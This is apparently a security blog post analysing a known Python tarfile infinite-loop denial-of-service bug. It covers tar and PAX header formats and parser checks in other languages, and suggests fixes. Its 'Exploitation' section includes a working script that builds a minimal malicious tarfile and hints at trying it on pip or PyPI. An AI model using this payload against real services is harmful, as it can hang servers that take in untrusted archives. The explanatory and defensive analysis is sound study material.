ℬ㏒.㎈ℓℯℛ.ⓧⓨℤ

Python tarfile infinite loop DoS

The Python tarfile module can end up in an infinite loop when opening maliciously malformed tar files. I came across the Denial of Service bug bpo-39017 while browsing the Python bug tracker for security issues (I didn't discover this bug myself). The error-reproducing tarfile the reporter uploaded came straight from the fuzzer, but I wanted to understand and isolate the issue by making the smallest tarfile which reproduces the bug.

Tarfile structure #

The name tar is derived from "tape archive", which harks back to its 1979 release to help store multiple files on magnetic tape. Tar files are made up of blocks of 512 bytes. There's no overall header or central directory: to list the files you have to scan through the tarfile and read every header record. Each header struct (257 bytes in the original format, 500 bytes with the ustar extensions) and each file's content is padded to the block size, so much of a small tarfile is NUL bytes. The header is a bit gross, with its integer fields encoded as ASCII digits in octal.
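To make the octal-in-ASCII business concrete, here is a minimal sketch that pulls a few fields out of one header block. The helper names `parse_octal` and `read_header` are mine, and the field offsets (name at 0, mode at 100, size at 124, typeflag at 156) are the standard ustar layout rather than anything specific to this post.

```python
def parse_octal(field: bytes) -> int:
    """Decode a NUL/space-terminated ASCII octal field; an empty field means 0."""
    digits = field.split(b"\x00", 1)[0].strip()
    return int(digits.decode("ascii"), 8) if digits else 0


def read_header(block: bytes) -> dict:
    """Pull a handful of fields out of one 512-byte header block."""
    if len(block) != 512:
        raise ValueError("a tar header occupies exactly one 512-byte block")
    return {
        "name": block[0:100].split(b"\x00", 1)[0].decode("utf-8", "replace"),
        "mode": parse_octal(block[100:108]),
        "size": parse_octal(block[124:136]),
        "typeflag": block[156:157],
    }


# Hand-built example header: a 14-byte regular file called "myfile".
example = bytearray(512)
example[0:6] = b"myfile"
example[100:108] = b"0000644\x00"
example[124:136] = b"00000000016\x00"  # octal 16 == decimal 14
example[156] = ord("0")

fields = read_header(bytes(example))
print(fields["name"], oct(fields["mode"]), fields["size"], fields["typeflag"])
```

Listing an archive is then a matter of reading a header, skipping `size` bytes rounded up to the next multiple of 512, and repeating.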

Serious tarfile vulnerabilities #

The tarfile headers contain the archived filenames. If the filename is an absolute path, some tarfile implementations can be tricked into extracting files to arbitrary locations. Arbitrary write may also be possible when extracting symlinks. The same issues affect other archive formats. This post isn't about these vulnerabilities.

PAX #

The bug is in the Python tarfile module's processing of PAX header records. PAX is a set of extensions for tar which adds properties left out of the original tar header struct, or which don't fit within the fixed-size fields defined in times gone by, e.g. symlinks, arbitrary resolution timestamps, uids > 2097151, file sizes > 8GB, long filenames. If we want to specify PAX information for a file, we make a fake file with the typeflag in the header record set to x (applies to the next file) or g (applies globally to the files that follow). The fake file's content is the extra PAX headers. The block after that content holds the normal header record for the real file, followed by blocks containing the file contents.
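Those two numeric limits fall straight out of the field widths. As a quick sanity check, assuming the usual layout where an n-byte numeric field holds n-1 octal digits plus a terminator (8 bytes for uid, 12 bytes for size):

```python
# An n-byte numeric field holds n-1 octal digits plus one terminator byte.
UID_FIELD_BYTES = 8
SIZE_FIELD_BYTES = 12

max_uid = 8 ** (UID_FIELD_BYTES - 1) - 1
max_size = 8 ** (SIZE_FIELD_BYTES - 1) - 1

print(max_uid)   # 2097151
print(max_size)  # 8589934591, i.e. one byte short of 8 GiB
```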

You can try making a PAX tarfile yourself. (Without --blocking-factor=1, GNU tar pads the archive out to a multiple of its default 20-block record, i.e. 10240 bytes.)

echo "myfilecontent" > myfile
tar -cf hello.tar --format=pax --blocking-factor=1 myfile
hexdump -C hello.tar
00000000  2e 2f 50 61 78 48 65 61  64 65 72 73 2e 31 39 31  |./PaxHeaders.191| # Header for fake file
00000010  37 37 2f 6d 79 66 69 6c  65 00 00 00 00 00 00 00  |77/myfile.......|
00000020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000060  00 00 00 00 30 30 30 30  36 34 34 00 30 30 30 30  |....0000644.0000|
00000070  30 30 30 00 30 30 30 30  30 30 30 00 30 30 30 30  |000.0000000.0000|
00000080  30 30 30 30 30 36 31 00  30 37 30 33 33 32 34 31  |0000061.07033241|
00000090  36 30 30 00 30 31 32 31  36 34 00 20 78 00 00 00  |600.012164. x...|
000000a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000100  00 75 73 74 61 72 00 30  30 00 00 00 00 00 00 00  |.ustar.00.......|
00000110  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000200  31 39 20 61 74 69 6d 65  3d 39 34 36 36 38 34 38  |19 atime=9466848| # PAX header records
00000210  30 30 0a 33 30 20 63 74  69 6d 65 3d 31 35 39 34  |00.30 ctime=1594|
00000220  33 34 30 33 32 30 2e 38  30 31 30 37 35 30 36 35  |340320.801075065|
00000230  0a 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000240  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000400  6d 79 66 69 6c 65 00 00  00 00 00 00 00 00 00 00  |myfile..........| # File header
00000410  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000460  00 00 00 00 30 30 30 30  36 34 34 00 30 30 30 31  |....0000644.0001|
00000470  37 35 30 00 30 30 30 31  37 35 30 00 30 30 30 30  |750.0001750.0000|
00000480  30 30 30 30 30 31 36 00  30 37 30 33 33 32 34 31  |0000016.07033241|
00000490  36 30 30 00 30 31 31 36  35 30 00 20 30 00 00 00  |600.011650. 0...|
000004a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000500  00 75 73 74 61 72 00 30  30 62 65 6e 00 00 00 00  |.ustar.00ben....|
00000510  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000520  00 00 00 00 00 00 00 00  00 62 65 6e 00 00 00 00  |.........ben....|
00000530  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000540  00 00 00 00 00 00 00 00  00 30 30 30 30 30 30 30  |.........0000000|
00000550  00 30 30 30 30 30 30 30  00 00 00 00 00 00 00 00  |.0000000........|
00000560  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000600  6d 79 66 69 6c 65 63 6f  6e 74 65 6e 74 0a 00 00  |myfilecontent...| # File content
00000610  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000c00  # 2 completely NULL blocks added at end

Notice the * lines: hexdump prints a * in place of a run of identical lines, which here are all NUL bytes. 512 = 0x200, so blocks start at 0x0, 0x200, 0x400, 0x600, 0x800, 0xA00.
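The same four-block layout can be reproduced without GNU tar. This is a rough sketch using Python's own tarfile writer; the `comment` keyword is an arbitrary record I picked to force an extended header, and the fake file's name will differ from GNU tar's `./PaxHeaders.…` naming.

```python
import io
import tarfile


def build_pax_archive() -> bytes:
    """Write a one-file PAX archive into memory and return its raw bytes."""
    payload = b"myfilecontent\n"
    info = tarfile.TarInfo("myfile")
    info.size = len(payload)
    info.pax_headers = {"comment": "hi"}  # arbitrary record, forces an 'x' header
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.PAX_FORMAT) as tar:
        tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


data = build_pax_archive()
blocks = [data[i:i + 512] for i in range(0, len(data), 512)]

# Block 0: fake-file header, block 1: PAX records,
# block 2: real file header, block 3: file content.
for index in range(4):
    block = blocks[index]
    print(hex(index * 512), block[156:157], block[:16])
```

For the two header blocks, the second column is the typeflag byte at offset 156; for the two content blocks it is just whatever byte happens to sit there.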

PAX headers structure #

A PAX header record is a UTF-8 encoded string of the format: "%d %s=%s\n", <length>, <keyword>, <value>

Several of these records can be concatenated.

The length is the length of the record, including the length field and the ending newline. The keyword cannot contain an equals sign. Standard keywords include 'path' & 'atime'.
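The slightly awkward part is that the length counts its own digits. A small sketch of an encoder (the function name `make_pax_record` is made up for illustration) just iterates until the number stops changing:

```python
def make_pax_record(keyword: str, value: str) -> bytes:
    """Encode one PAX record as b"<length> <keyword>=<value>\\n"."""
    if "=" in keyword:
        raise ValueError("keyword must not contain '='")
    body = f" {keyword}={value}\n".encode("utf-8")
    length = len(body)
    # The length field includes its own digits, so grow it to a fixed point.
    while True:
        total = len(body) + len(str(length))
        if total == length:
            break
        length = total
    return str(length).encode("ascii") + body


print(make_pax_record("atime", "946684800"))
print(make_pax_record("ctime", "1594340320.801075065"))
```

These two calls reproduce the `19 atime=...` and `30 ctime=...` records visible at offset 0x200 in the hexdump.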

The bug #

The length and keyword are extracted with a regex. That's not the problem. The problem is that the length is never validated, and it is the only thing that advances the parse position:

regex = re.compile(br"(\d+) ([^=]+)=")
pos = 0
while True:
    match = regex.match(buf, pos)
    if not match:
        break

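    length, keyword = match.groups()
    length = int(length)  # taken from the file as-is; zero is never rejected
    ...
    pos += length  # a zero length leaves pos unchanged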

If length is zero, e.g. if buf contains "0 X=", pos never advances, the regex matches the same record again on every iteration, and we loop forever.
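One way to harden the loop is to insist that each record's claimed length at least covers what the regex consumed, stays inside the buffer, and lands on a newline. This is my own sketch (the name `parse_pax_records` and the use of `ValueError` are assumptions), not necessarily the patch that landed upstream:

```python
import re

_RECORD = re.compile(br"(\d+) ([^=]+)=")


def parse_pax_records(buf: bytes) -> dict:
    """Parse concatenated PAX records, rejecting lengths that cannot be valid."""
    records = {}
    pos = 0
    while True:
        match = _RECORD.match(buf, pos)
        if not match:
            break
        length = int(match.group(1))
        end = pos + length
        # A valid record spans at least "<len> <key>=" plus the final newline,
        # so `end` is strictly greater than `pos` and the loop always advances.
        if end < match.end() + 1 or end > len(buf) or buf[end - 1:end] != b"\n":
            raise ValueError(f"invalid PAX record length {length} at offset {pos}")
        keyword = match.group(2).decode("utf-8")
        records[keyword] = buf[match.end():end - 1].decode("utf-8")
        pos = end
    return records


good = b"19 atime=946684800\n30 ctime=1594340320.801075065\n" + b"\x00" * 16
print(parse_pax_records(good))
```

With this check, feeding in `b"0 X="` raises `ValueError` instead of spinning.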

Does this affect other languages? #

In the Rust crate tar-rs, the block is first split on newline characters. The length field is then checked against the actual length of the record. I didn't see any tarfile documentation that forbids newline characters within a keyword, so tar-rs would reject a record that has one, but that's almost definitely ok. Go checks that the length is sensible and then that the record ends in a newline. Ruby and PHP seem ok.
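For comparison, here is the split-on-newline strategy as described above, written out in Python. It is a sketch of the approach only, not a translation of the tar-rs source, and `parse_by_lines` is a name I made up. Because it walks a finite list of lines, a bogus length can cause a rejection but never a loop.

```python
def parse_by_lines(buf: bytes) -> dict:
    """Split on newlines first, then check each record's declared length."""
    records = {}
    for line in buf.rstrip(b"\x00").split(b"\n"):
        if not line:
            continue
        length_field, space, rest = line.partition(b" ")
        keyword, equals, value = rest.partition(b"=")
        if not space or not equals or not length_field.isdigit():
            raise ValueError("malformed PAX record")
        # split() removed the trailing newline, so add it back when comparing.
        if int(length_field) != len(line) + 1:
            raise ValueError("declared length does not match record")
        records[keyword.decode("utf-8")] = value.decode("utf-8")
    return records


print(parse_by_lines(b"19 atime=946684800\n" + b"\x00" * 8))
```

The trade-off is the one mentioned above: any record with a newline inside its keyword or value gets rejected.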

This is probably a python-only bug.

Exploitation #

First we make a 512-byte header block specifying that the following block is PAX information (type is 'x' or 'g'). Then we append "0 X=" for a total of 516 bytes.

Feed the output file into tarfile.open() or tarfile.is_tarfile() and wait a very long time. Or try pip install recursion.tar. I'd imagine that the PyPI server is vulnerable to this, but as far as I'm aware not many Python services ingest untrusted tarfiles.
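If you'd rather not hang your own shell, a subprocess with a timeout works as a probe. A minimal sketch, where `finishes_within` is a hypothetical helper and the 5 second default is an arbitrary choice:

```python
import subprocess
import sys


def finishes_within(path: str, timeout: float = 5.0) -> bool:
    """Return False if tarfile.is_tarfile(path) is still running after `timeout` seconds."""
    probe = "import sys, tarfile; tarfile.is_tarfile(sys.argv[1])"
    try:
        subprocess.run(
            [sys.executable, "-c", probe, path],
            timeout=timeout,
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
        )
    except subprocess.TimeoutExpired:
        # subprocess.run kills the child before raising, so nothing is left spinning.
        return False
    return True
```

Calling `finishes_within("recursion.tar")` should return False on an affected interpreter and True on a patched one. It only tells you whether the call returned in time, not whether the file is a valid tarfile.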

Script for minimal reproducing tarfile:

def make_file() -> bytearray:
    header = bytearray(512)
    header[0x7c] = 0x31  # size = ASCII '1' (must be > 0)
    header[0x94:0x9d] = b"000630\x00 g"  # chksum + typeflag 'g'
    return header + b"0 X="


with open("recursion.tar", "wb") as f:
    f.write(make_file())
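The magic 000630 in the script is the header checksum: the sum of all 512 header bytes with the 8-byte chksum field itself counted as spaces. A short check (the helper name `tar_checksum` is mine) that rebuilds the same header and recomputes it:

```python
def tar_checksum(header: bytes) -> int:
    """Sum all 512 header bytes, counting the chksum field (148..155) as spaces."""
    if len(header) != 512:
        raise ValueError("expected a 512-byte header block")
    return sum(header[:148]) + 8 * ord(" ") + sum(header[156:])


# Same bytes as the reproducing script above.
header = bytearray(512)
header[0x7c] = 0x31
header[0x94:0x9d] = b"000630\x00 g"

stored = int(header[148:154].decode("ascii"), 8)
computed = tar_checksum(bytes(header))
print(oct(stored), oct(computed))  # 0o630 0o630
```

The only nonzero contributions are the '1' in the size field (49), the 'g' typeflag (103) and the eight spaces (256), which add up to 408, or 630 in octal.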

Downloads #